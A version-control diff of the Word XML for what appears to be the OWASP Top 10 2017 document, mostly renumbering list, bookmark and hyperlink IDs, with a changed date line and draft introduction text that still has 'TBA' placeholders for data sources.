         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9643,7 +9555,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9664,7 +9576,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9685,7 +9597,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9706,7 +9618,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9727,7 +9639,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9748,7 +9660,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9769,7 +9681,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9790,7 +9702,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9811,7 +9723,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9830,7 +9742,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId154">
+      <w:hyperlink r:id="rId172">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -9843,7 +9755,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9864,7 +9776,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9885,7 +9797,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9906,7 +9818,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9927,7 +9839,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9948,7 +9860,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9969,7 +9881,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9990,7 +9902,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -10011,7 +9923,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -10032,7 +9944,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -10053,7 +9965,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -10074,7 +9986,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -10095,7 +10007,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -10116,7 +10028,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -10134,7 +10046,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -10155,7 +10067,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -10176,7 +10088,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1044"/>
+          <w:numId w:val="1052"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -10205,8 +10117,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="155" w:name="appendix-b-references"/>
-      <w:bookmarkEnd w:id="155"/>
+      <w:bookmarkStart w:id="173" w:name="appendix-b-references"/>
+      <w:bookmarkEnd w:id="173"/>
       <w:r>
         <w:t xml:space="preserve">Appendix B: References</w:t>
       </w:r>
@@ -10222,14 +10134,14 @@
     <w:p>
       <w:pPr>
         <w:numPr>
-          <w:numId w:val="1045"/>
+          <w:numId w:val="1053"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">OWASP Proactive Controls -</w:t>
       </w:r>
-      <w:hyperlink r:id="rId156">
+      <w:hyperlink r:id="rId174">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -10241,14 +10153,14 @@
     <w:p>
       <w:pPr>
         <w:numPr>
-          <w:numId w:val="1045"/>
+          <w:numId w:val="1053"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">OWASP Application Security Verification Standard -</w:t>
       </w:r>
-      <w:hyperlink r:id="rId157">
+      <w:hyperlink r:id="rId175">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -10260,7 +10172,7 @@
     <w:p>
       <w:pPr>
         <w:numPr>
-          <w:numId w:val="1045"/>
+          <w:numId w:val="1053"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -10275,14 +10187,14 @@
     <w:p>
       <w:pPr>
         <w:numPr>
-          <w:numId w:val="1045"/>
+          <w:numId w:val="1053"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">OWASP Privacy Top 10 Risks -</w:t>
       </w:r>
-      <w:hyperlink r:id="rId158">
+      <w:hyperlink r:id="rId176">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -10294,14 +10206,14 @@
     <w:p>
       <w:pPr>
         <w:numPr>
-          <w:numId w:val="1045"/>
+          <w:numId w:val="1053"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">OWASP Mobile Top 10 Risks -</w:t>
       </w:r>
-      <w:hyperlink r:id="rId159">
+      <w:hyperlink r:id="rId177">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -10322,7 +10234,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1046"/>
+          <w:numId w:val="1054"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -10332,7 +10244,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId160">
+      <w:hyperlink r:id="rId178">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -10345,7 +10257,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1046"/>
+          <w:numId w:val="1054"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -10355,7 +10267,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId161">
+      <w:hyperlink r:id="rId179">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -10368,7 +10280,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1046"/>
+          <w:numId w:val="1054"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -10378,7 +10290,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId162">
+      <w:hyperlink r:id="rId180">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -10787,7 +10699,7 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="990">
-    <w:nsid w:val="707d28f3"/>
+    <w:nsid w:val="fa729b78"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:lvl w:ilvl="0">
       <w:numFmt w:val="bullet"/>
@@ -10868,7 +10780,7 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="991">
-    <w:nsid w:val="39c84b59"/>
+    <w:nsid w:val="762d98a4"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:lvl w:ilvl="0">
       <w:numFmt w:val="bullet"/>
@@ -10949,7 +10861,7 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="99201">
-    <w:nsid w:val="ac8ebb6b"/>
+    <w:nsid w:val="fc438cdc"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
@@ -11085,7 +10997,28 @@
     <w:abstractNumId w:val="991"/>
   </w:num>
   <w:num w:numId="1004">
-    <w:abstractNumId w:val="991"/>
+    <w:abstractNumId w:val="99201"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="1">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="2">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="3">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="4">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="5">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="6">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
   </w:num>
   <w:num w:numId="1005">
     <w:abstractNumId w:val="991"/>
@@ -11109,27 +11042,6 @@
     <w:abstractNumId w:val="991"/>
   </w:num>
   <w:num w:numId="1012">
-    <w:abstractNumId w:val="991"/>
-  </w:num>
-  <w:num w:numId="1013">
-    <w:abstractNumId w:val="991"/>
-  </w:num>
-  <w:num w:numId="1014">
-    <w:abstractNumId w:val="991"/>
-  </w:num>
-  <w:num w:numId="1015">
-    <w:abstractNumId w:val="991"/>
-  </w:num>
-  <w:num w:numId="1016">
-    <w:abstractNumId w:val="991"/>
-  </w:num>
-  <w:num w:numId="1017">
-    <w:abstractNumId w:val="991"/>
-  </w:num>
-  <w:num w:numId="1018">
-    <w:abstractNumId w:val="991"/>
-  </w:num>
-  <w:num w:numId="1019">
     <w:abstractNumId w:val="99201"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
@@ -11153,7 +11065,31 @@
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
+  <w:num w:numId="1013">
+    <w:abstractNumId w:val="991"/>
+  </w:num>
+  <w:num w:numId="1014">
+    <w:abstractNumId w:val="991"/>
+  </w:num>
+  <w:num w:numId="1015">
+    <w:abstractNumId w:val="991"/>
+  </w:num>
+  <w:num w:numId="1016">
+    <w:abstractNumId w:val="991"/>
+  </w:num>
+  <w:num w:numId="1017">
+    <w:abstractNumId w:val="991"/>
+  </w:num>
+  <w:num w:numId="1018">
+    <w:abstractNumId w:val="991"/>
+  </w:num>
+  <w:num w:numId="1019">
+    <w:abstractNumId w:val="991"/>
+  </w:num>
   <w:num w:numId="1020">
+    <w:abstractNumId w:val="991"/>
+  </w:num>
+  <w:num w:numId="1021">
     <w:abstractNumId w:val="99201"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
@@ -11177,11 +11113,29 @@
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
-  <w:num w:numId="1021">
-    <w:abstractNumId w:val="991"/>
-  </w:num>
   <w:num w:numId="1022">
-    <w:abstractNumId w:val="991"/>
+    <w:abstractNumId w:val="99201"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="1">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="2">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="3">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="4">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="5">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="6">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
   </w:num>
   <w:num w:numId="1023">
     <w:abstractNumId w:val="991"/>
@@ -11253,6 +11207,30 @@
     <w:abstractNumId w:val="991"/>
   </w:num>
   <w:num w:numId="1046">
+    <w:abstractNumId w:val="991"/>
+  </w:num>
+  <w:num w:numId="1047">
+    <w:abstractNumId w:val="991"/>
+  </w:num>
+  <w:num w:numId="1048">
+    <w:abstractNumId w:val="991"/>
+  </w:num>
+  <w:num w:numId="1049">
+    <w:abstractNumId w:val="991"/>
+  </w:num>
+  <w:num w:numId="1050">
+    <w:abstractNumId w:val="991"/>
+  </w:num>
+  <w:num w:numId="1051">
+    <w:abstractNumId w:val="991"/>
+  </w:num>
+  <w:num w:numId="1052">
+    <w:abstractNumId w:val="991"/>
+  </w:num>
+  <w:num w:numId="1053">
+    <w:abstractNumId w:val="991"/>
+  </w:num>
+  <w:num w:numId="1054">
     <w:abstractNumId w:val="991"/>
   </w:num>
 </w:numbering>

--- a/2017/OWASP-Top-10-2017-en.docx
+++ b/2017/OWASP-Top-10-2017-en.docx
@@ -68,7 +68,7 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t>October 15, 2017</w:t>
+        <w:t>October 17, 2017 (Andrew's birthday)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -104,7 +104,7 @@
         <w:pStyle w:val="Heading1"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="__RefHeading___Toc2362_1944273953"/>
+      <w:bookmarkStart w:id="1" w:name="__RefHeading___Toc2351_410054668"/>
       <w:bookmarkStart w:id="2" w:name="important-notice"/>
       <w:bookmarkEnd w:id="1"/>
       <w:bookmarkEnd w:id="2"/>
@@ -236,17 +236,11 @@
         </w:numPr>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="__RefHeading___Toc2364_1944273953"/>
-      <w:bookmarkStart w:id="4" w:name="toc"/>
+      <w:bookmarkStart w:id="3" w:name="__RefHeading___Toc2353_410054668"/>
       <w:bookmarkEnd w:id="3"/>
-      <w:bookmarkEnd w:id="4"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>T</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>able of Contents</w:t>
+      <w:r>
+        <w:rPr/>
+        <w:t>Table of Contents</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -285,7 +279,7 @@
       <w:r>
         <w:fldChar w:fldCharType="separate"/>
       </w:r>
-      <w:hyperlink w:anchor="__RefHeading___Toc2362_1944273953">
+      <w:hyperlink w:anchor="__RefHeading___Toc2351_410054668">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="IndexLink"/>
@@ -304,7 +298,7 @@
         </w:tabs>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink w:anchor="__RefHeading___Toc2364_1944273953">
+      <w:hyperlink w:anchor="__RefHeading___Toc2353_410054668">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="IndexLink"/>
@@ -323,7 +317,7 @@
         </w:tabs>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink w:anchor="__RefHeading___Toc2366_1944273953">
+      <w:hyperlink w:anchor="__RefHeading___Toc2355_410054668">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="IndexLink"/>
@@ -342,7 +336,7 @@
         </w:tabs>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink w:anchor="__RefHeading___Toc2368_1944273953">
+      <w:hyperlink w:anchor="__RefHeading___Toc2357_410054668">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="IndexLink"/>
@@ -361,7 +355,7 @@
         </w:tabs>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink w:anchor="__RefHeading___Toc2370_1944273953">
+      <w:hyperlink w:anchor="__RefHeading___Toc2359_410054668">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="IndexLink"/>
@@ -380,7 +374,7 @@
         </w:tabs>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink w:anchor="__RefHeading___Toc2372_1944273953">
+      <w:hyperlink w:anchor="__RefHeading___Toc2361_410054668">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="IndexLink"/>
@@ -399,7 +393,7 @@
         </w:tabs>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink w:anchor="__RefHeading___Toc2374_1944273953">
+      <w:hyperlink w:anchor="__RefHeading___Toc2363_410054668">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="IndexLink"/>
@@ -418,7 +412,7 @@
         </w:tabs>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink w:anchor="__RefHeading___Toc2376_1944273953">
+      <w:hyperlink w:anchor="__RefHeading___Toc2365_410054668">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="IndexLink"/>
@@ -437,7 +431,7 @@
         </w:tabs>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink w:anchor="__RefHeading___Toc2378_1944273953">
+      <w:hyperlink w:anchor="__RefHeading___Toc2367_410054668">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="IndexLink"/>
@@ -456,7 +450,7 @@
         </w:tabs>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink w:anchor="__RefHeading___Toc2380_1944273953">
+      <w:hyperlink w:anchor="__RefHeading___Toc2369_410054668">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="IndexLink"/>
@@ -475,7 +469,7 @@
         </w:tabs>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink w:anchor="__RefHeading___Toc2382_1944273953">
+      <w:hyperlink w:anchor="__RefHeading___Toc2371_410054668">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="IndexLink"/>
@@ -494,7 +488,7 @@
         </w:tabs>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink w:anchor="__RefHeading___Toc2384_1944273953">
+      <w:hyperlink w:anchor="__RefHeading___Toc2373_410054668">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="IndexLink"/>
@@ -513,7 +507,7 @@
         </w:tabs>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink w:anchor="__RefHeading___Toc2386_1944273953">
+      <w:hyperlink w:anchor="__RefHeading___Toc2375_410054668">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="IndexLink"/>
@@ -532,7 +526,7 @@
         </w:tabs>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink w:anchor="__RefHeading___Toc2388_1944273953">
+      <w:hyperlink w:anchor="__RefHeading___Toc2377_410054668">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="IndexLink"/>
@@ -551,7 +545,7 @@
         </w:tabs>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink w:anchor="__RefHeading___Toc2390_1944273953">
+      <w:hyperlink w:anchor="__RefHeading___Toc2379_410054668">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="IndexLink"/>
@@ -570,7 +564,7 @@
         </w:tabs>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink w:anchor="__RefHeading___Toc2392_1944273953">
+      <w:hyperlink w:anchor="__RefHeading___Toc2381_410054668">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="IndexLink"/>
@@ -589,7 +583,7 @@
         </w:tabs>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink w:anchor="__RefHeading___Toc2394_1944273953">
+      <w:hyperlink w:anchor="__RefHeading___Toc2383_410054668">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="IndexLink"/>
@@ -608,7 +602,7 @@
         </w:tabs>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink w:anchor="__RefHeading___Toc2396_1944273953">
+      <w:hyperlink w:anchor="__RefHeading___Toc2385_410054668">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="IndexLink"/>
@@ -627,7 +621,7 @@
         </w:tabs>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink w:anchor="__RefHeading___Toc2398_1944273953">
+      <w:hyperlink w:anchor="__RefHeading___Toc2387_410054668">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="IndexLink"/>
@@ -646,7 +640,7 @@
         </w:tabs>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink w:anchor="__RefHeading___Toc2400_1944273953">
+      <w:hyperlink w:anchor="__RefHeading___Toc2389_410054668">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="IndexLink"/>
@@ -665,7 +659,7 @@
         </w:tabs>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink w:anchor="__RefHeading___Toc2402_1944273953">
+      <w:hyperlink w:anchor="__RefHeading___Toc2391_410054668">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="IndexLink"/>
@@ -684,7 +678,7 @@
         </w:tabs>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink w:anchor="__RefHeading___Toc2404_1944273953">
+      <w:hyperlink w:anchor="__RefHeading___Toc2393_410054668">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="IndexLink"/>
@@ -712,22 +706,22 @@
         <w:pStyle w:val="Heading1"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="__RefHeading___Toc2366_1944273953"/>
-      <w:bookmarkStart w:id="6" w:name="o-about-owasp"/>
+      <w:bookmarkStart w:id="4" w:name="__RefHeading___Toc2355_410054668"/>
+      <w:bookmarkStart w:id="5" w:name="o-about-owasp"/>
+      <w:bookmarkEnd w:id="4"/>
       <w:bookmarkEnd w:id="5"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>O About OWASP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="6" w:name="foreword"/>
       <w:bookmarkEnd w:id="6"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>O About OWASP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="foreword"/>
-      <w:bookmarkEnd w:id="7"/>
       <w:r>
         <w:rPr/>
         <w:t>Foreword</w:t>
@@ -904,8 +898,8 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="about-owasp"/>
-      <w:bookmarkEnd w:id="8"/>
+      <w:bookmarkStart w:id="7" w:name="about-owasp"/>
+      <w:bookmarkEnd w:id="7"/>
       <w:r>
         <w:rPr/>
         <w:t>About OWASP</w:t>
@@ -1082,8 +1076,8 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="copyright-and-license"/>
-      <w:bookmarkEnd w:id="9"/>
+      <w:bookmarkStart w:id="8" w:name="copyright-and-license"/>
+      <w:bookmarkEnd w:id="8"/>
       <w:r>
         <w:rPr/>
         <w:t>Copyright and License</w:t>
@@ -1486,13 +1480,55 @@
         <w:pStyle w:val="Heading1"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="__RefHeading___Toc2368_1944273953"/>
-      <w:bookmarkStart w:id="11" w:name="introduction"/>
+      <w:bookmarkStart w:id="9" w:name="__RefHeading___Toc2357_410054668"/>
+      <w:bookmarkStart w:id="10" w:name="introduction"/>
+      <w:bookmarkEnd w:id="9"/>
       <w:bookmarkEnd w:id="10"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>Introduction</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="11" w:name="welcome"/>
       <w:bookmarkEnd w:id="11"/>
       <w:r>
         <w:rPr/>
-        <w:t>Introduction</w:t>
+        <w:t>Welcome</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Welcome to the OWASP Top 10 2017! This major update adds several new issues, including two issues selected by the community - A8:2017-Deserialization and A10:2017-Insufficient logging and monitoring. Community feedback also drove the collection of the most amount of data ever assembled in the preparation of an application security standard, and so we are confident that the remaining 8 issues are the most important for organizations to address, particularly the A3:2017-Exposure of Sensitive Data in the age of the EU's General Data Protection Regulation, A5:2017-Misconfiguration especially around cloud and API services, and A9:2017 Known Vulnerabilities, which can be especially challenging for those on modern platforms, like node.js.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>The OWASP Top 10 for 2017 is based primarily on TBA large datasets from firms that specialize in application security, including TBA consulting companies and TBA product vendors. This data spans vulnerabilities gathered from hundreds of organizations and over 114,000 real-world applications and APIs. The Top 10 items are selected and prioritized according to this prevalence data, in combination with consensus estimates of exploitability, detectability, and impact.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>A primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the consequences of the most common and most important web application security weaknesses. The Top 10 provides basic techniques to protect against these high risk problem areas – and also provides guidance on where to go from here.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1500,50 +1536,8 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="welcome"/>
+      <w:bookmarkStart w:id="12" w:name="warnings"/>
       <w:bookmarkEnd w:id="12"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>Welcome</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
